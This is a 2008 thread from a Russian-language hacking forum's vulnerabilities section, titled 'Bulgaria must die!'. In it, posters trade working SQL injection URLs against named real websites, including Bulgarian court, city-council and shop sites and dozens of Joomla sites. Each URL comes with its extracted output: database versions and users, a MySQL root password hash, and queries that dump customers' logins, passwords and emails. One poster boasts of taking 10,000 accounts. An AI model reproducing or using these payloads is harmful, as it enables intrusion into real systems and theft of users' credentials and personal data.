HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Болгария must die!
  #1  
Старый 31.01.2008, 23:29
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию Болгария must die!

http://www.buildingoftheyear.bg/

Код HTML:
http://www.buildingoftheyear.bg/vote.php?id=-273+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8/*
5.0.32-Debian_7etch5-log:boty_user@localhost:boty

http://bg-interface.net/

Код HTML:
http://bg-interface.net/view.php?id=-112+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16/*
4.1.22:kitchenb_kitchen@localhost:kitchenb_bgintef ace

http://www.bar.bg/

Код HTML:
http://www.bar.bg/designs/inox2_bg.php?id=292+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,version(),user(),database()),28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68/*
5.0.45-community:barbg_site@localhost:barbg_bar

http://nij.court-bg.org/

Код HTML:
http://nij.court-bg.org/bg/info.php?id=-10+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12/*
5.0.45-Debian_1:root@localhost:nij

http://sofiacouncil.bg/

Код HTML:
http://sofiacouncil.bg/index.php?page=news&id=-75+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9/*
4.0.21-log:sosadm@localhost:sosdb

http://www.cem.bg/

Код HTML:
http://www.cem.bg/r.php?sitemap_id=78&id=-2345+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*
4.0.24_Debian-10sarge2-log:cemdb@localhost:cem

http://www.savoyrent.com/

Код HTML:
http://www.savoyrent.com/r.php?sitemap_id=32&id=-154+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8/*
4.0.24_Debian-10sarge2-log:savoy@localhost:savoy_new

http://www.hillman.bg/

Код HTML:
http://www.hillman.bg/show_product.php?id=-57+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x3a,version(),user(),database()),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*&selected_id=57
5.0.33-log:hillman@localhost:hillman

http://mtexbg.com/

Код HTML:
http://mtexbg.com/products.php?id=131+and(1=2)+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/*
4.0.27-standard:mtexbg@localhost:mtexbg_mtex

Последний раз редактировалось ~EviL~; 05.02.2008 в 23:09..
 
Ответить с цитированием

  #2  
Старый 01.02.2008, 07:31
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Код:
http://www.incharacter.org/article.php?article=null/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,user(),database(),version()),4,5,6/*
templeton@localhost:incharacter:4.0.21-nt
 
Ответить с цитированием

  #3  
Старый 01.02.2008, 15:13
WuWu
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344

Репутация: 48
По умолчанию

Код HTML:
http://www.uprava.org/section.php?id=9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7/*
4.0.27
uprava-org@he2.hoster.ru
uprava-org


Код HTML:
http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
4.0.27-standard-log
i-shop@localhost
I-shop
 
Ответить с цитированием

  #4  
Старый 02.02.2008, 21:31
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


По умолчанию

Цитата:
Сообщение от WuWu  
Код HTML:
http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
4.0.27-standard-log
i-shop@localhost
I-shop
PHP код:
http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat(login,0x3a,pass,0x3a,email),3,id,5+from+customers/* 
10k акков... надеюсь, никто не пострадает
 
Ответить с цитированием

  #5  
Старый 02.02.2008, 22:37
bobob
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454

Репутация: 142
По умолчанию

Цитата:
http://www.a*i*n*a*u*d*i*o.l*v/index.php?item=92&cat=-18+union+select+concat_ws(0x3a,id,email,pwd,valida tion_key,valid,created,phone,fullname,lastvisit,pa y_vat,type_pers,bill_to,ship_to),2+from+users+limi t+6,1/*
для просмотра меняем лимиты

Последний раз редактировалось bobob; 02.02.2008 в 22:42..
 
Ответить с цитированием

  #6  
Старый 01.02.2008, 16:31
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


По умолчанию

Код:
http://shop.nourost.ru/index.php?cat=100500%20UNION%20SELECT%20NULL,NULL,CONCAT(USER(),0x3a,VERSION(),0x3a,DATABASE()),NULL,NULL,NULL--
http://www.mks-ks.ru/shop/cat.php?id=100500+UNION+SELECT+1,2,3,CONCAT(USER(),0x3a,VERSION(),0x3a,DATABASE())--
 
Ответить с цитированием

  #7  
Старый 01.02.2008, 18:46
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


По умолчанию

Код:
http://www.pilot-film.com/index.php?id=99999999+union+select+0,concat(100500),0,0,0,0,0,0,0,0,0/*
http://www.gamesfirst.com/index.php?id=999999+union+select+concat(username,0x3a,password),concat(user(),0x3a,version(),0x3a,database()),0+from+users/*

Последний раз редактировалось it's my; 02.02.2008 в 02:57..
 
Ответить с цитированием

  #8  
Старый 02.02.2008, 02:56
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


По умолчанию

Код:
http://aquarella.portraits.free.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
http://getawebsite.co.za/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://houston.windowssupport.us/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://kamilo.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://netrou.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://parkhaus-occamstrasse.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://pibbca.org.br/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.adeosys.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.amisaquero.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.biodigital.pt/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.bugesco.be/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,p  assword),12,13,14,15,16,17,18+FROM+jos_users--
http://www.dip-gradjenje.hr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.espritmx.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.experience-digitale.com/services/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.fogl.co.yu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.genim.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.happyboots.ch/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.hatfielddesign.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.infobit.si/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.itelcom.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.laniq.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.mxpro-racing.com/web05/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.ninaris.hu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.pcl-assistance.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.povecalo.com/site/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.ptsims.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.rhinoportail.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.salatiello.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.samrotoli.biz/site/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
http://www.sisred.com/Joomla/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
http://www.siteinternet.re/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.web-upp.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users/*
 
Ответить с цитированием

  #9  
Старый 02.02.2008, 04:17
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

мускул инж
Цитата:
http://islamlib.com/id/index.php?page=article&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27+from+users/*
 
Ответить с цитированием

  #10  
Старый 02.02.2008, 23:30
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171

Репутация: 88
По умолчанию

Искал аккорды на гитару нашёл скулю))
Довольно хитрая фильтрация, без ковычки перед union ничего не пашет
Код:
http://tabcrawler.com/search.php?show=artist-list&letter=-1'+union+select+password+from+mysql.user/*
root: 46b0f804077918b1
*d450d21dcc39df8471df867995cec28cb04061bf
Пятая ветка, таблицы выкладываются сразу все списком
Код:
http://tabcrawler.com/search.php?show=artist-list&letter=-1'+union+select+Table_name+from+information_schema.tables/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.